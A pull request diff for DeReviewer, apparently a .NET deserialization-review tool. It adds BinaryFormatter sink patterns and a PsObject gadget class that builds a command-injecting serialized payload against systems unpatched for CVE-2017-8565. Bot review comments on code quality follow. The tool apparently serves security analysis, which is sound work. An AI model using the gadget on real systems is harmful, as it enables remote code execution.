Implemented PsObject gadget and added few patterns for binary formatter #1

Open
wants to merge 1 commit into
base: master
121 changes: 60 additions & 61 deletions DeReviewer.Analysis/DeReviewer.Analysis.csproj
@@ -1,69 +1,68 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{495F718A-D925-4639-B6B9-00D00A17B3F6}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>DeReviewer.Analysis</RootNamespace>
<AssemblyName>DeReviewer.Analysis</AssemblyName>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="AssemblyInfo.cs" />
<Compile Include="CallGraph.cs" />
<Compile Include="CallGraphBuilder.cs" />
<Compile Include="CallGraphNode.cs" />
<Compile Include="CallInfo.cs" />
<Compile Include="GraphViz.cs" />
<Compile Include="IndexDB.cs" />
<Compile Include="MethodDefExtensions.cs" />
<Compile Include="MethodUniqueSignature.cs" />
<Compile Include="MethodUniqueSignatureExtensions.cs" />
<Compile Include="PatternInfo.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\dnlib\src\dnlib.csproj">
<Project>{f1b76fe5-8338-4bf6-9570-b285e852952b}</Project>
<Name>dnlib</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{495F718A-D925-4639-B6B9-00D00A17B3F6}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>DeReviewer.Analysis</RootNamespace>
<AssemblyName>DeReviewer.Analysis</AssemblyName>
<TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="AssemblyInfo.cs" />
<Compile Include="CallGraph.cs" />
<Compile Include="CallGraphBuilder.cs" />
<Compile Include="CallGraphNode.cs" />
<Compile Include="CallInfo.cs" />
<Compile Include="GraphViz.cs" />
<Compile Include="IndexDB.cs" />
<Compile Include="MethodDefExtensions.cs" />
<Compile Include="MethodUniqueSignature.cs" />
<Compile Include="MethodUniqueSignatureExtensions.cs" />
<Compile Include="PatternInfo.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\dnlib\src\dnlib.csproj">
<Project>{f1b76fe5-8338-4bf6-9570-b285e852952b}</Project>
<Name>dnlib</Name>
</ProjectReference>
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<!-- To modify your build process, add your task inside one of the targets below and uncomment it.
Other similar extension points exist, see Microsoft.Common.targets.
<Target Name="BeforeBuild">
</Target>
<Target Name="AfterBuild">
</Target>
-->

</Project>
</Project>
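--- a/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs
+++ b/DeReviewer.KnowledgeBase/Cases/BinaryFormatterPatterns.cs
@@ -4,52 +4,98 @@
 
 namespace DeReviewer.KnowledgeBase.Cases
 {
-public class BinaryFormatterPatterns : Case
-{
-public void Deserialize()
-{
-var serializer = new BinaryFormatter();
-Pattern.CreateBySignature(it =>
-serializer.Deserialize(
-it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>()));
-}
-
-public void DeserializeHeaderHandler()
-{
-var serializer = new BinaryFormatter();
-Pattern.CreateBySignature(it =>
-serializer.Deserialize(
-it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
-null));
-}
-
-public void DeserializeMethodResponse()
-{
-var serializer = new BinaryFormatter();
-Pattern.CreateBySignature(it =>
-serializer.DeserializeMethodResponse(
-it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
-null,
-null));
-}
-
-public void UnsafeDeserialize()
-{
-var serializer = new BinaryFormatter();
-Pattern.CreateBySignature(it =>
-serializer.UnsafeDeserialize(
-it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
-null));
-}
-
-public void UnsafeDeserializeMethodResponse()
-{
-var serializer = new BinaryFormatter();
-Pattern.CreateBySignature(it =>
-serializer.UnsafeDeserializeMethodResponse(
-it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
-null,
-null));
-}
+public class BinaryFormatterPatterns : Case
+{
+public void DeserializeTypeConfuseDelegate()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.Deserialize(
+it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>()));
+}
+
+public void DeserializePsObject()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.Deserialize(
+it.IsPayloadOf<PsObject>().Format<Binary>()));
+}
+
+public void DeserializeHeaderHandlerTypeConfuseDelegate()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.Deserialize(
+it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
+null));
+}
+
+public void DeserializeHeaderHandlerPsObject()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.Deserialize(
+it.IsPayloadOf<PsObject>().Format<Binary>(),
+null));
+}
+
+public void DeserializeMethodResponseTypeConfuseDelegate()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.DeserializeMethodResponse(
+it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
+null,
+null));
+}
+
+public void DeserializeMethodResponsePsObject()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.DeserializeMethodResponse(
+it.IsPayloadOf<PsObject>().Format<Binary>(),
+null,
+null));
+}
+
+public void UnsafeDeserializeTypeConfuseDelegate()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.UnsafeDeserialize(
+it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
+null));
+}
+
+public void UnsafeDeserializePsObject()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.UnsafeDeserialize(
+it.IsPayloadOf<PsObject>().Format<Binary>(),
+null));
+}
+
+public void UnsafeDeserializeMethodResponseTypeConfuseDelegate()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.UnsafeDeserializeMethodResponse(
+it.IsPayloadOf<TypeConfuseDelegate>().Format<Binary>(),
+null,
+null));
+}
+
+public void UnsafeDeserializeMethodResponsePsObject()
+{
+var serializer = new BinaryFormatter();
+Pattern.CreateBySignature(it =>
+serializer.UnsafeDeserializeMethodResponse(
+it.IsPayloadOf<PsObject>().Format<Binary>(),
+null,
+null));
+}
 }
 }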
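Review bot: The rewritten class carries no comment explaining why every BinaryFormatter entry point now appears twice, once with TypeConfuseDelegate and once with PsObject, nor that the PsObject variants only compile with the System.Management.Automation reference this PR adds to the KnowledgeBase csproj. A class-level comment such as `// One pattern per (BinaryFormatter entry point, gadget) pair; the PsObject patterns need the System.Management.Automation reference assembly.` would make the structure explicit. The ten methods differ only in the overload called and the gadget type argument, so a private generic helper would remove most of the repetition, but whether Case discovery tolerates that depends on how Pattern.CreateBySignature and Case enumerate methods, which is not visible here. The file's using directives (lines 1-3) lie outside the hunk.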
5 changes: 5 additions & 0 deletions DeReviewer.KnowledgeBase/DeReviewer.KnowledgeBase.csproj
@@ -37,6 +37,9 @@
<Reference Include="PresentationFramework" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=MSIL">
<HintPath>..\packages\Microsoft.PowerShell.5.ReferenceAssemblies.1.1.0\lib\net4\System.Management.Automation.dll</HintPath>
</Reference>
<Reference Include="System.Xaml" />
<Reference Include="System.Xml" />
<Reference Include="WindowsBase" />
@@ -67,6 +70,7 @@
<Compile Include="Formatters\Binary.cs" />
<Compile Include="Formatters\Xaml.cs" />
<Compile Include="Gadgets\ObjectDataProvider.cs" />
<Compile Include="Gadgets\PsObject.cs" />
<Compile Include="Gadgets\TypeConfuseDelegate.cs" />
<Compile Include="PayloadGenerationMode.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
@@ -77,6 +81,7 @@
</ItemGroup>
<ItemGroup>
<None Include="packages.config" />
<Content Include="Payloads\PsObject.clixml" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\DeReviewer.Analysis\DeReviewer.Analysis.csproj">
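--- /dev/null
+++ b/DeReviewer.KnowledgeBase/Gadgets/PsObject.cs
@@ -0,0 +1,39 @@
+using System;
+using System.IO;
+using System.Management.Automation;
+using System.Runtime.Serialization;
+using System.Runtime.Serialization.Formatters.Binary;
+
+namespace DeReviewer.KnowledgeBase.Gadgets
+{
+// PsObject Gadget by Alvaro Munoz and Oleksandr Mirosh.
+// Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)
+internal class PsObject : IGadget
+{
+public object Build(string command)
+{
+string clixmlData = File.ReadAllText(@"Payloads\PsObject.clixml")
+.Replace("%CMD%", command);
+
+return new PsObjectMarshal(clixmlData);
+}
+}
+
+[Serializable]
+internal class PsObjectMarshal : ISerializable
+{
+private readonly string clixmlData;
+
+public void GetObjectData(SerializationInfo info, StreamingContext context)
+{
+Type typePso = typeof(PSObject);
+info.SetType(typePso);
+info.AddValue("CliXml", clixmlData);
+}
+
+public PsObjectMarshal(string clixmlData)
+{
+this.clixmlData = clixmlData;
+}
+}
+}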
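Review bot: `File.ReadAllText(@"Payloads\PsObject.clixml")` in PsObject.Build resolves against the process working directory rather than the assembly location, and the KnowledgeBase csproj hunk that adds `<Content Include="Payloads\PsObject.clixml" />` carries no CopyToOutputDirectory metadata, so the template is neither copied to bin\ nor found unless the tool happens to be started from the project folder. Reading it via `Path.Combine(AppContext.BaseDirectory, "Payloads", "PsObject.clixml")` and adding `<CopyToOutputDirectory>PreserveNewest</CopyToOutputDirectory>` to the Content item would make the lookup independent of the caller's directory. `using System.Runtime.Serialization.Formatters.Binary;` is unused in this file. PsObjectMarshal implements ISerializable without the usual `(SerializationInfo, StreamingContext)` constructor, which appears intentional because GetObjectData rewrites the serialized type to PSObject and the marshal class itself is never read back; a one-line comment on the class stating that would spare the next reader the question.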